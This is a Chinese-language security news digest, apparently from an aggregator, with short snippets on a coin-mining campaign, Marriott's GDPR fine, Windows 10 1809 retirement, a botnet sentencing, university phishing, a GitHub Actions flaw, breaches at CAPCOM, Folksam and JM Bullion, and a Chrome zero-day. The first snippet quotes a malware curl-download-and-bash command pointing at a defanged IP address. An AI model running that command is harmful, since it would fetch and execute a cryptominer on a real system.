感谢腾讯御见威胁情报中心来稿！ 非云企业安全防护 curl -fsSL http[:]//218.61.5.109/errors/z0.txt-o /tmp/solrbash /tmp/solr

该代码下载shell脚本z0.txt保存为/tmp/solr并通过bash命令执行。z0.txt首先通过匹配进程和文件名清除竞品挖矿木马。...

英国隐私监管机构表示，已就喜达屋酒店及度假酒店国际集团(Starwood Hotels & Resorts Worldwide Inc., 简称﹕喜达屋)遭受网络攻击对万豪国际集团(Marriott International Inc., MAR)处以1840万英镑（2380万美元）的罚款。 英国信息委员办公室（ICO）表示，一项调查发现万豪未能实施适当的技术或组织措施来保护其系统上处理的个人数据，该机构对该公司未能确保客户个人数据的安全而实施处罚。

今年3月31日，万豪国际集团发布公告，称约520万名客人的信息可能被泄露，包括姓名、地址、联系方式、偏好等。...

按照今年早些时候更新的生命周期，微软正准备退役另一个Windows 10版本, 它是Windows 10 Build 1809，或者说2018年10月更新，一直是微软桌面操作系统最具争议的功能更新之一，许多人实际上将其描述为该公司迄今为止最大的失败。 而这一切都是因为2018年10月更新出厂时存在一个重大的bug，有可能导致某些存储在库中的用户文件被删除，这一切都因为微软在向生产设备推出新版本之前实际上没有解决这个问题。这家软件巨头最终决定暂时撤下该更新，只是在大约一个月后重新发布了该更新，并出现了其他错误。...

俄罗斯网络犯罪分子因参与一个造成至少1亿美元经济损失的僵尸网络计划而被判入狱8年。 据悉，犯罪分子Aleksandr Brovko是“数个精英在线论坛的活跃成员，这些论坛旨在为讲俄语的网络犯罪分子收集和交换其犯罪工具和服务。”Brovko编写了能够解析来自僵尸网络来源的数据脚本，搜索了数据转储以盗取个人身份信息（PII）和帐户凭据。 美国司法部声称：“Brovko攻击了超过200,000台未经授权的个人识别信息或金融帐户访问设备。”...

最近，我们观察到了Silent Librarian APT黑客组织针对全球范围内大学的网络钓鱼活动。10月19日，通过伪装的COVID-19调查，我们确定了针对哥伦比亚大学（UBC）员工的新型网络钓鱼文档，该文档是一个会自动下载勒索软件并勒索受害者的恶意Word文件。幸运的是， … 更多内容请至Seebug Paper  阅读全文：https://paper.seebug.org/1390/...

过去几年，谷歌 Project Zero 团队已经披露过影响 Windows 10、macOS、iOS 等平台的严重安全漏洞。通常情况下，受影响的机构将有 90 天的时间来筹备修复，然后相关漏洞详情才会被公开披露。最新消息是， 据悉，问题源于 GitHub Actions 中的工作流命令极易受到注入攻击。而所谓的 Actions，主要负责与“动作执行器”（Action Runner）之间的通信工作。 Felix Wilhelm 在审查源代码时发现了这个严重的安全隐患：“当进程解析至 STDOUT 的每一行，以寻找工作流命令时，每个 GitHub 操作都会在执行过程中打印出不受信任的内容”。...

日本知名的游戏公司CAPCOM今天上午发布官方公告，称该公司服务器11月2日遭到第三方未授权访问。这次外部未授权的方位主要集中在公司的邮件及文件服务器，目前尚未发现用户资料和信息被盗取的证据。据悉，CAPCOM内部的邮件和文件服务器在11月2日凌晨被未授权的第三方访问， CAPCOM在公告中表示目前还没有任何迹象表明用户信息遭到破坏，而且这次网络攻击也没有影响CAPCOM旗下游戏的网络功能。接下来CAPCOM将联合警方及相关部门进行调查并逐步恢复网络等系统功能。...

在过去几周时间里，谷歌都在积极修复存在于 Chrome 浏览器中的多个安全漏洞。最新发现的一个漏洞存在于桌面端 Chrome 的 V8 JavaScript 引擎中，能够发起远程执行代码（RCE）攻击。而存在于 Android 端 Chrome 中的一个漏洞能从沙盒中逃脱。 谷歌威胁分析小组(TAG)和 Project Zero 团队的专家上周发现了零日漏洞 CVE-2020-16009。本周一，谷歌面向 Windows、macOS 和 Linux 发布了 Chrome 86.0.4240.183 更新，修复了上述漏洞。...

当地时间11月3日，瑞典最大的保险公司Folksam在新闻稿中证实，近100万客户的个人信息已泄露给Facebook和Google等社交媒体。Folksam表示歉意，并已要求公司删除该信息。 在一次内部审计中，Folksam发现与数字合作伙伴共享了大约100万人的个人数据，其中一些被认为是敏感的。Folksam已要求合作伙伴公司删除该信息。 “我们知道这会引起客户的关注，我们认真对待发生的事情。我们已立即停止共享个人信息，并要求将其删除。”Folksam营销和销售主管表示，“我们这样做的目的是分析并为客户提供定制的报价，但是不幸的是，我们没有以正确的方式做到这一点。”...

简而言之。在线零售商是想窃取客户数据的黑客的高价值目标，而最近的一次违规事件可能证明对犯罪者来说特别有利可图，这次受害者是JM Bullion，一家贵金属销售。Bleeping Computer报道，这家在线零售商销售金、银、铜、铂金和钯金产品，如硬币和金条。它的网站在2月份被入侵， 2020年7月6日，JM Bullion被提醒其网站上有可疑活动。JM Bullion立即开始调查，在第三方安全专家的协助下，评估事件的性质和范围。通过调查，确定在2020年2月18日至2020年7月17日期间，网站上存在恶意代码，该代码有能力在有限的场景下获取客户在购买时输入的信息。"...